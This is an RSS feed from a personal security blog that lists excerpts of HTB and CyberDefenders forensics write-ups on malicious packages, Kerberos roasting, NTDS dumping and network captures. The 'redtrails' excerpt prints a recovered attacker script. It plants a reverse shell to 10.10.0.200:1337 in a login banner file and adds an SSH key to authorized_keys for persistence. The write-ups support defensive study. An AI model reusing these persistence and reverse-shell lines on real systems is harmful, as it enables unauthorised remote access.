<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>Mike.Horn</title>
    <link>https://mikehorn-git.github.io/</link>
    <description>Recent content on Mike.Horn</description>
    <generator>Hugo</generator>
    <language>en</language>
    <lastBuildDate>Fri, 18 Oct 2024 00:00:00 +0200</lastBuildDate>
    <atom:link href="https://mikehorn-git.github.io/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>nuts</title>
      <link>https://mikehorn-git.github.io/writeups/htb/sherlocks/nuts/</link>
      <pubDate>Fri, 18 Oct 2024 00:00:00 +0200</pubDate>
      <guid>https://mikehorn-git.github.io/writeups/htb/sherlocks/nuts/</guid>
      <description>&lt;h1 id=&#34;q1-what-action-did-alex-take-to-integrate-the-purported-time-saving-package-into-the-deployment-process-provide-the-full-command&#34;&gt;Q1: What action did Alex take to integrate the purported time-saving package into the deployment process? (provide the full command)&lt;/h1&gt;
&lt;p&gt;Review the PowerShell history file:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;ConsoleHost_history.txt&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Look for commands related to NuGet package installation.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&#34;History&#34; loading=&#34;lazy&#34; src=&#34;./writeups/htb/sherlocks/nuts/2024-09-22T22:56:27,889083437+02:00.png&#34;&gt;&lt;/p&gt;
&lt;p&gt;Identify the full command used to install the package.&lt;/p&gt;
&lt;hr&gt;
&lt;h1 id=&#34;q2-identify-the-url-from-which-the-package-was-downloaded-&#34;&gt;Q2: Identify the URL from which the package was downloaded ?&lt;/h1&gt;
&lt;p&gt;Examine the &lt;strong&gt;web browsing history&lt;/strong&gt; on the system.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&#34;Url&#34; loading=&#34;lazy&#34; src=&#34;./writeups/htb/sherlocks/nuts/2024-10-13T18_19_20,030404275+02_00.png&#34;&gt;&lt;/p&gt;
&lt;p&gt;Locate the URL used to download the NuGet package.&lt;/p&gt;</description>
    </item>
    <item>
      <title>redtrails</title>
      <link>https://mikehorn-git.github.io/writeups/htb/challenges/redtrails/</link>
      <pubDate>Thu, 10 Oct 2024 00:00:00 +0200</pubDate>
      <guid>https://mikehorn-git.github.io/writeups/htb/challenges/redtrails/</guid>
      <description>&lt;h1 id=&#34;introduction&#34;&gt;Introduction&lt;/h1&gt;
&lt;p&gt;The flag is split into &lt;strong&gt;three parts&lt;/strong&gt;. In this investigation, we were able to recover &lt;strong&gt;two parts&lt;/strong&gt;. We start from a provided &lt;code&gt;.pcap&lt;/code&gt; file.&lt;/p&gt;
&lt;hr&gt;
&lt;h1 id=&#34;1st-part&#34;&gt;1st part&lt;/h1&gt;
&lt;p&gt;The capture contains &lt;strong&gt;two HTTP frames&lt;/strong&gt;. The second frame is large and contains interesting data.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Load the payload in &lt;strong&gt;CyberChef&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Apply &lt;strong&gt;reverse&lt;/strong&gt; and &lt;strong&gt;Base64 decode&lt;/strong&gt; operations.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt=&#34;CyberChef&#34; loading=&#34;lazy&#34; src=&#34;./writeups/htb/challenges/redtrails/2024-10-08T21:38:10,624043836+02:00.png&#34;&gt;&lt;/p&gt;
&lt;p&gt;After decoding, deobfuscate the &lt;strong&gt;bash script&lt;/strong&gt; manually.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;cp&#34;&gt;#!/bin/bash
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;lhJVXukWibAFfkv&lt;span class=&#34;o&#34;&gt;()&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;    &lt;span class=&#34;nb&#34;&gt;echo&lt;/span&gt; &lt;span class=&#34;s1&#34;&gt;&amp;#39;bash -c &amp;#34;bash -i &amp;gt;&amp;amp; /dev/tcp/10.10.0.200/1337 0&amp;gt;&amp;amp;1&amp;#34;&amp;#39;&lt;/span&gt; &amp;gt; /etc/update-motd.d/00-header
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;x7KG0bvubT6dID2&lt;span class=&#34;o&#34;&gt;()&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;    &lt;span class=&#34;nb&#34;&gt;echo&lt;/span&gt; -e &lt;span class=&#34;s2&#34;&gt;&amp;#34;\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC8Vkq9UTKMakAx2Zq+PnZNc6nYuEK3ZVXxH15bbUeB+elCb3JbVJyBfvAuZ0sonfAqZsyq9Jg6/KGtNsEmtVKXroPXhzFumTgg7Z1NvrUNvnqLIcfxTnP1+/4X284hp0bF2VbITb6oQKgzRdOs8GtOasKaK0k//2E5o0RKIEdrx0aL5HBOGPx0p8GrGe4kRKoAokGXwDVT22LlBylRkA6+x6jZtd2gYhCMgSZ0iM9RyY7k7K13tHXzEk7OciUmd5/Z7Yuolnt3ByX9a+IfLMD/FQNy1B4DYhsY62O7o2xR0vxkBEp5UhBAX8gOTG0wjzrUHxmdUimXgiy39YVZaTJQwLBtzJS//YhkewyF/+CP0H7wIKIErlf5WFK5skLYO6uKVpx6akGXY8GADnPU3iPK/MtBC+RqWssdkGqFIA5xG2Fn+Klid9Obm1uXexJfYVjJMOfvuqtb6KcgLmi5uRkA6+x6jZtd2gYhCMgSZ0iM9RyY7k7K13tHXzEk7OciUmd5/Z7Yuolnt3ByX9a+IlSxaiOAD2iNJboNuUIxMH/9HNYKd6mlwUpovqFcGBqXizcF21bxNGoOE31Vfox2fq2qW30BDWtHrrYi76iLh02FerHEYHdQAAA08NfUHyCw0fVl/qt6bAgKSb02k691lcDAo5JpEEzNQpub0X8xJItrbw==HTB{r3d15_1n574nc35&amp;#34;&lt;/span&gt; &amp;gt;&amp;gt; ~/.ssh/authorized_keys
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;	&lt;span class=&#34;o&#34;&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;hL8FbEfp9L1261G&lt;span class=&#34;o&#34;&gt;()&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;	lhJVXukWibAFfkv
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;	x7KG0bvubT6dID2
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;hL8FbEfp9L1261G
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The script reveals the &lt;strong&gt;first flag&lt;/strong&gt; embedded in an &lt;code&gt;ssh-rsa&lt;/code&gt; key.&lt;/p&gt;</description>
    </item>
    <item>
      <title>obscure</title>
      <link>https://mikehorn-git.github.io/writeups/htb/challenges/obscure/</link>
      <pubDate>Sun, 29 Sep 2024 00:00:00 +0200</pubDate>
      <guid>https://mikehorn-git.github.io/writeups/htb/challenges/obscure/</guid>
      <description>&lt;h1 id=&#34;introduction&#34;&gt;Introduction&lt;/h1&gt;
&lt;p&gt;We are provided with two files:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A &lt;strong&gt;PCAP file&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;A &lt;strong&gt;PHP file&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h1 id=&#34;pcap-analysis&#34;&gt;PCAP Analysis&lt;/h1&gt;
&lt;p&gt;Start by analyzing the PCAP before fully deobfuscating &lt;code&gt;support.php&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Filter for &lt;strong&gt;HTTP POST&lt;/strong&gt; requests:&lt;/p&gt;
&lt;p&gt;&lt;img alt=&#34;POST&#34; loading=&#34;lazy&#34; src=&#34;./assets/2024-09-28T23:17:53,862253486+02:00.png&#34;&gt;&lt;/p&gt;
&lt;p&gt;Only &lt;strong&gt;4 POST requests&lt;/strong&gt; are present.&lt;/p&gt;
&lt;p&gt;Follow the HTTP streams to inspect the payloads. You will observe obfuscated strings such as:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;0UlYyJHG87EJqEz66f8af44abea0QKxO/n6DAwXuGEoc5X9/H3HkMXv1Ih75Fx1NdSPRNDPUmHTy351039f4a7b5&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;img alt=&#34;STREAM&#34; loading=&#34;lazy&#34; src=&#34;./assets/2024-09-28T23:22:19,040121186+02:00.png&#34;&gt;&lt;/p&gt;
&lt;p&gt;These strings will be used as input for the PHP deobfuscation.&lt;/p&gt;
&lt;hr&gt;
&lt;h1 id=&#34;php-analysis&#34;&gt;PHP Analysis&lt;/h1&gt;
&lt;p&gt;The provided PHP script performs multiple layers of obfuscation:&lt;/p&gt;</description>
    </item>
    <item>
      <title>red stealer</title>
      <link>https://mikehorn-git.github.io/writeups/cyberdefenders/red_stealer/</link>
      <pubDate>Sun, 29 Sep 2024 00:00:00 +0200</pubDate>
      <guid>https://mikehorn-git.github.io/writeups/cyberdefenders/red_stealer/</guid>
      <description>&lt;h1 id=&#34;introduction&#34;&gt;Introduction&lt;/h1&gt;
&lt;p&gt;Tools recommended by the author (important for this analysis):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Whois&lt;/li&gt;
&lt;li&gt;VirusTotal&lt;/li&gt;
&lt;li&gt;MalwareBazaar&lt;/li&gt;
&lt;li&gt;ThreatFox&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h1 id=&#34;q1-categorizing-malware-allows-for-a-quicker-and-easier-understanding-of-the-malware-aiding-in-understanding-its-distinct-behaviors-and-attack-vectors-whats-the-identified-malwares-category&#34;&gt;Q1: Categorizing malware allows for a quicker and easier understanding of the malware, aiding in understanding its distinct behaviors and attack vectors. What&amp;rsquo;s the identified malware&amp;rsquo;s category?&lt;/h1&gt;
&lt;p&gt;Submit the file hash to &lt;strong&gt;VirusTotal&lt;/strong&gt; and review the main summary page.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&#34;MainPage&#34; loading=&#34;lazy&#34; src=&#34;./writeups/cyberdefenders/red_stealer/2024-09-28T16:05:54,875091188+02:00.png&#34;&gt;&lt;/p&gt;
&lt;p&gt;Identify the malware &lt;strong&gt;category&lt;/strong&gt; based on detection labels and classification.&lt;/p&gt;
&lt;hr&gt;
&lt;h1 id=&#34;q2-clear-identification-of-the-malware-file-name-facilitates-better-communication-among-the-soc-team-whats-the-file-name-associated-with-this-malware&#34;&gt;Q2: Clear identification of the malware file name facilitates better communication among the SOC team. What&amp;rsquo;s the file name associated with this malware?&lt;/h1&gt;
&lt;p&gt;On the &lt;strong&gt;VirusTotal&lt;/strong&gt; main/detection page, locate the file details.&lt;/p&gt;</description>
    </item>
    <item>
      <title>reveal</title>
      <link>https://mikehorn-git.github.io/writeups/cyberdefenders/reveal/</link>
      <pubDate>Sat, 28 Sep 2024 00:00:00 +0200</pubDate>
      <guid>https://mikehorn-git.github.io/writeups/cyberdefenders/reveal/</guid>
      <description>&lt;h1 id=&#34;q1-what-action-did-alex-take-to-integrate-the-purported-time-saving-package-into-the-deployment-process-provide-the-full-command&#34;&gt;Q1: What action did Alex take to integrate the purported time-saving package into the deployment process? (provide the full command)&lt;/h1&gt;
&lt;p&gt;Review the PowerShell history file:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;ConsoleHost_history.txt&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Look for commands related to NuGet package installation.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&#34;History&#34; loading=&#34;lazy&#34; src=&#34;./2024-09-22T22:56:27,889083437+02:00.png&#34;&gt;&lt;/p&gt;
&lt;p&gt;Identify the full command used to install the package.&lt;/p&gt;
&lt;hr&gt;
&lt;h1 id=&#34;q2-identify-the-url-from-which-the-package-was-downloaded-&#34;&gt;Q2: Identify the URL from which the package was downloaded ?&lt;/h1&gt;
&lt;p&gt;Examine the &lt;strong&gt;web browsing history&lt;/strong&gt; on the system.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&#34;Url&#34; loading=&#34;lazy&#34; src=&#34;./2024-10-13T18_19_20,030404275+02_00.png&#34;&gt;&lt;/p&gt;
&lt;p&gt;Locate the URL used to download the NuGet package.&lt;/p&gt;</description>
    </item>
    <item>
      <title>heartbreaker-continuum</title>
      <link>https://mikehorn-git.github.io/writeups/htb/sherlocks/heartbreaker-continuum/</link>
      <pubDate>Mon, 23 Sep 2024 00:00:00 +0200</pubDate>
      <guid>https://mikehorn-git.github.io/writeups/htb/sherlocks/heartbreaker-continuum/</guid>
      <description>&lt;h1 id=&#34;q1-to-accurately-reference-and-identify-the-suspicious-binary-please-provide-its-sha256-hash&#34;&gt;Q1: To accurately reference and identify the suspicious binary, please provide its SHA256 hash.&lt;/h1&gt;
&lt;p&gt;Identify the SHA256 hash of the suspicious binary file.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;File Name:&lt;/strong&gt; &lt;code&gt;Superstar_MemberCard.tiff.exe&lt;/code&gt;
&lt;strong&gt;SHA256:&lt;/strong&gt; &lt;code&gt;12daa34111bb54b3dcbad42305663e44e7e6c3842f015cccbbe6564d9dfd3ea3&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h1 id=&#34;q2-when-was-the-binary-file-originally-created-according-to-its-metadata-utc&#34;&gt;Q2: When was the binary file originally created, according to its metadata (UTC)?&lt;/h1&gt;
&lt;p&gt;Upload the file hash to &lt;strong&gt;VirusTotal&lt;/strong&gt; to retrieve metadata information.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&#34;VT&#34; loading=&#34;lazy&#34; src=&#34;./writeups/htb/sherlocks/heartbreaker-continuum/2024-09-22T11:34:24,713072253+02:00.png&#34;&gt;&lt;/p&gt;
&lt;p&gt;Locate the &lt;strong&gt;first seen / creation timestamp&lt;/strong&gt; and convert it to &lt;strong&gt;UTC&lt;/strong&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;h1 id=&#34;q3-examining-the-code-size-in-a-binary-file-can-give-indications-about-its-functionality-could-you-specify-the-byte-size-of-the-code-in-this-binary&#34;&gt;Q3: Examining the code size in a binary file can give indications about its functionality. Could you specify the byte size of the code in this binary?&lt;/h1&gt;
&lt;p&gt;Use a tool such as &lt;strong&gt;readpe&lt;/strong&gt; to inspect the binary structure.&lt;/p&gt;</description>
    </item>
    <item>
      <title>campfire-1</title>
      <link>https://mikehorn-git.github.io/writeups/htb/sherlocks/campfire-1/</link>
      <pubDate>Sun, 22 Sep 2024 00:00:00 +0200</pubDate>
      <guid>https://mikehorn-git.github.io/writeups/htb/sherlocks/campfire-1/</guid>
      <description>&lt;h1 id=&#34;q1-analyzing-domain-controller-security-logs&#34;&gt;Q1: Analyzing Domain Controller Security Logs&lt;/h1&gt;
&lt;p&gt;Can you confirm the &lt;strong&gt;date and time&lt;/strong&gt; when the &lt;em&gt;Kerberoasting&lt;/em&gt; activity occurred?&lt;/p&gt;
&lt;p&gt;Open &lt;strong&gt;Event Viewer&lt;/strong&gt; on the Windows VM and search for &lt;strong&gt;Event ID &lt;a href=&#34;https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4769&#34;&gt;4769&lt;/a&gt;&lt;/strong&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;🕒 Remember to convert your local time to &lt;strong&gt;UTC&lt;/strong&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;img alt=&#34;Kerberoasting Event&#34; loading=&#34;lazy&#34; src=&#34;./writeups/htb/sherlocks/campfire-1/2024-09-21T16_52_20,152679715+02_00.png&#34;&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h1 id=&#34;q2-targeted-service-name&#34;&gt;Q2: Targeted Service Name&lt;/h1&gt;
&lt;p&gt;What is the &lt;strong&gt;Service Name&lt;/strong&gt; that was targeted?&lt;/p&gt;
&lt;p&gt;Check the &amp;ldquo;Service Information&amp;rdquo; section of the same event:&lt;/p&gt;
&lt;p&gt;&lt;img alt=&#34;Service Name&#34; loading=&#34;lazy&#34; src=&#34;./writeups/htb/sherlocks/campfire-1/2024-09-21T16_58_06,480108177+02_00.png&#34;&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h1 id=&#34;q3-workstation-identification&#34;&gt;Q3: Workstation Identification&lt;/h1&gt;
&lt;p&gt;Identify the &lt;strong&gt;Workstation IP Address&lt;/strong&gt; from which the activity originated.&lt;/p&gt;</description>
    </item>
    <item>
      <title>campfire-2</title>
      <link>https://mikehorn-git.github.io/writeups/htb/sherlocks/campfire-2/</link>
      <pubDate>Sun, 22 Sep 2024 00:00:00 +0200</pubDate>
      <guid>https://mikehorn-git.github.io/writeups/htb/sherlocks/campfire-2/</guid>
      <description>&lt;h1 id=&#34;q1-when-did-the-as-rep-roasting-attack-occur-and-when-did-the-attacker-request-the-kerberos-ticket-for-the-vulnerable-user&#34;&gt;Q1: When did the &lt;em&gt;AS-REP Roasting&lt;/em&gt; attack occur, and when did the attacker request the Kerberos ticket for the vulnerable user?&lt;/h1&gt;
&lt;p&gt;Open &lt;strong&gt;Event Viewer&lt;/strong&gt; on the Windows VM and search for &lt;strong&gt;Event ID &lt;a href=&#34;https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4768&#34;&gt;4768&lt;/a&gt;&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Look for anomalies in the logs — specifically events where:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Pre-Authentication Type:&lt;/strong&gt; &lt;code&gt;0&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This indicates that the account does not require Kerberos pre-authentication, making it vulnerable to &lt;em&gt;AS-REP Roasting&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&#34;ASREP Event&#34; loading=&#34;lazy&#34; src=&#34;./writeups/htb/sherlocks/campfire-2/2024-09-21T18:18:55,910252335+02:00.png&#34;&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;🕒 Remember to convert the timestamp to &lt;strong&gt;UTC&lt;/strong&gt; when documenting your findings.&lt;/p&gt;</description>
    </item>
    <item>
      <title>crownjewel-1</title>
      <link>https://mikehorn-git.github.io/writeups/htb/sherlocks/crownjewel-1/</link>
      <pubDate>Sun, 22 Sep 2024 00:00:00 +0200</pubDate>
      <guid>https://mikehorn-git.github.io/writeups/htb/sherlocks/crownjewel-1/</guid>
      <description>&lt;h1 id=&#34;q1-attackers-can-abuse-the-vssadmin-utility-to-create-volume-shadow-snapshots-and-then-extract-sensitive-files-like-ntdsdit-to-bypass-security-mechanisms-identify-the-time-when-the-volume-shadow-copy-service-entered-a-running-state&#34;&gt;Q1: Attackers can abuse the vssadmin utility to create volume shadow snapshots and then extract sensitive files like NTDS.dit to bypass security mechanisms. Identify the time when the Volume Shadow Copy service entered a running state.&lt;/h1&gt;
&lt;p&gt;Open the &lt;strong&gt;SYSTEM.evtx&lt;/strong&gt; log and search for &lt;strong&gt;Event ID 7036&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Look for events indicating the &lt;strong&gt;Volume Shadow Copy&lt;/strong&gt; service entering a running state:&lt;/p&gt;
&lt;p&gt;&lt;img alt=&#34;7036&#34; loading=&#34;lazy&#34; src=&#34;./writeups/htb/sherlocks/crownjewel-1/2024-09-21T11_58_52,679703907+02_00.png&#34;&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;🕒 Convert the timestamp to &lt;strong&gt;UTC&lt;/strong&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h1 id=&#34;q2-when-a-volume-shadow-snapshot-is-created-the-volume-shadow-copy-service-validates-the-privileges-using-the-machine-account-and-enumerates-user-groups-find-the-user-groups-it-enumerates-the-subject-account-name-and-also-identify-the-process-idin-decimal-of-the-volume-shadow-copy-service-process&#34;&gt;Q2: When a volume shadow snapshot is created, the Volume shadow copy service validates the privileges using the Machine account and enumerates User groups. Find the User groups it enumerates, the Subject Account name, and also identify the Process ID(in decimal) of the Volume shadow copy service process&lt;/h1&gt;
&lt;p&gt;Search for &lt;strong&gt;Event ID &lt;a href=&#34;https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4799&#34;&gt;4799&lt;/a&gt;&lt;/strong&gt; and filter for:&lt;/p&gt;</description>
    </item>
    <item>
      <title>crownjewel-2</title>
      <link>https://mikehorn-git.github.io/writeups/htb/sherlocks/crownjewel-2/</link>
      <pubDate>Sun, 22 Sep 2024 00:00:00 +0200</pubDate>
      <guid>https://mikehorn-git.github.io/writeups/htb/sherlocks/crownjewel-2/</guid>
      <description>&lt;h1 id=&#34;q1-when-utilizing-ntdsutilexe-to-dump-ntds-on-disk-it-simultaneously-employs-the-microsoft-shadow-copy-service-what-is-the-most-recent-timestamp-at-which-this-service-entered-the-running-state-signifying-the-possible-initiation-of-the-ntds-dumping-process&#34;&gt;Q1: When utilizing ntdsutil.exe to dump NTDS on disk, it simultaneously employs the Microsoft Shadow Copy Service. What is the most recent timestamp at which this service entered the running state, signifying the possible initiation of the NTDS dumping process?&lt;/h1&gt;
&lt;p&gt;Open the &lt;strong&gt;SYSTEM.evtx&lt;/strong&gt; log and search for &lt;strong&gt;Event ID 7036&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Use a search (Ctrl+F) for &lt;strong&gt;Volume Shadow Copy&lt;/strong&gt; service events.&lt;/p&gt;
&lt;p&gt;Identify the most recent entry where the service entered the running state and note the timestamp from the:&lt;/p&gt;</description>
    </item>
    <item>
      <title>reaper</title>
      <link>https://mikehorn-git.github.io/writeups/htb/sherlocks/reaper/</link>
      <pubDate>Sat, 21 Sep 2024 00:00:00 +0200</pubDate>
      <guid>https://mikehorn-git.github.io/writeups/htb/sherlocks/reaper/</guid>
      <description>&lt;h1 id=&#34;q1-ip-address-of-forela-wkstn001&#34;&gt;Q1: IP Address of Forela-Wkstn001&lt;/h1&gt;
&lt;p&gt;What is the IP address of &lt;strong&gt;Forela-Wkstn001&lt;/strong&gt;?&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;🔎 See Q2 for the analysis steps.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h1 id=&#34;q2-ip-address-of-forela-wkstn002&#34;&gt;Q2: IP Address of Forela-Wkstn002&lt;/h1&gt;
&lt;p&gt;What is the IP address of &lt;strong&gt;Forela-Wkstn002&lt;/strong&gt;?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; NetworkMiner requires &lt;code&gt;.pcap&lt;/code&gt; format. Convert the file if needed:&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;tshark -F pcap -r ntlmrelay.pcapng -w ntlmrelay.pcap
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Open the capture in &lt;strong&gt;NetworkMiner&lt;/strong&gt; to get an overview of network activity.
Both workstation IP addresses can be identified here:&lt;/p&gt;
&lt;p&gt;&lt;img alt=&#34;NetworkMiner Overview&#34; loading=&#34;lazy&#34; src=&#34;./writeups/htb/sherlocks/reaper/2024-09-21T15_32_55,042790459+02_00.png&#34;&gt;&lt;/p&gt;</description>
    </item>
  </channel>
</rss>
